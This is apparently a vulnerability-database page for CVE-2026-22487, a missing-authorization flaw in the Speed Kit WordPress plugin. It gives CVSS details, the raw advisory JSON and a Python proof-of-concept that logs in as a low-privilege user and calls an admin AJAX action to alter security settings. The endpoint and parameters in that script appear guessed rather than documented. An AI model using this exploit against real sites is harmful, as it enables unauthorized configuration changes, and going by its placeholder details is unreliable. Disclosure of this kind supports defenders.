Security Vulnerability Report
中文
CVE-2026-22487 CVSS 4.3 MEDIUM

CVE-2026-22487

Published: 2026-01-08 17:15:51
Last Modified: 2026-04-23 15:36:34

Description

Missing Authorization vulnerability in baqend Speed Kit baqend allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Speed Kit: from n/a through <= 2.0.2.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

baqend Speed Kit WordPress Plugin <= 2.0.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-22487 PoC - baqend Speed Kit Missing Authorization # This PoC demonstrates how a low-privilege user can exploit the broken access control import requests import sys # Target WordPress site with vulnerable baqend Speed Kit plugin target_url = "http://target-wordpress-site.com" # Authentication credentials (low-privilege user) username = "low_privilege_user" password = "user_password" def get_auth_token(): """Obtain authentication token via WordPress login""" login_url = f"{target_url}/wp-login.php" session = requests.Session() login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } response = session.post(login_url, data=login_data) return session.cookies.get_dict() def exploit_broken_access_control(cookies): """ Exploit the missing authorization vulnerability Try to access admin-only plugin functionality """ # Target plugin's admin endpoint (example path) admin_endpoint = f"{target_url}/wp-admin/admin-ajax.php" # Craft malicious request to exploit broken access control # This attempts to access privileged functionality with low-privilege credentials exploit_data = { 'action': 'baqend_speedkit_admin_action', 'sub_action': 'modify_settings', 'security_level': 'low', # Attempt to modify security settings 'new_config': 'malicious_config' } response = requests.post(admin_endpoint, data=exploit_data, cookies=cookies) if response.status_code == 200: print("[+] Successfully accessed privileged functionality!") print(f"[+] Response: {response.text}") return True else: print("[-] Access denied or vulnerability patched") return False if __name__ == "__main__": print("[*] CVE-2026-22487 Exploitation Tool") print("[*] Target: baqend Speed Kit WordPress Plugin <= 2.0.2") cookies = get_auth_token() if cookies: print("[+] Successfully authenticated as low-privilege user") exploit_broken_access_control(cookies) else: print("[-] Authentication failed")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22487", "sourceIdentifier": "[email protected]", "published": "2026-01-08T17:15:50.923", "lastModified": "2026-04-23T15:36:34.253", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in baqend Speed Kit baqend allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Speed Kit: from n/a through <= 2.0.2."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en baqend Speed Kit permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Speed Kit: desde n/a hasta 2.0.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/baqend/vulnerability/wordpress-speed-kit-plugin-2-0-2-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}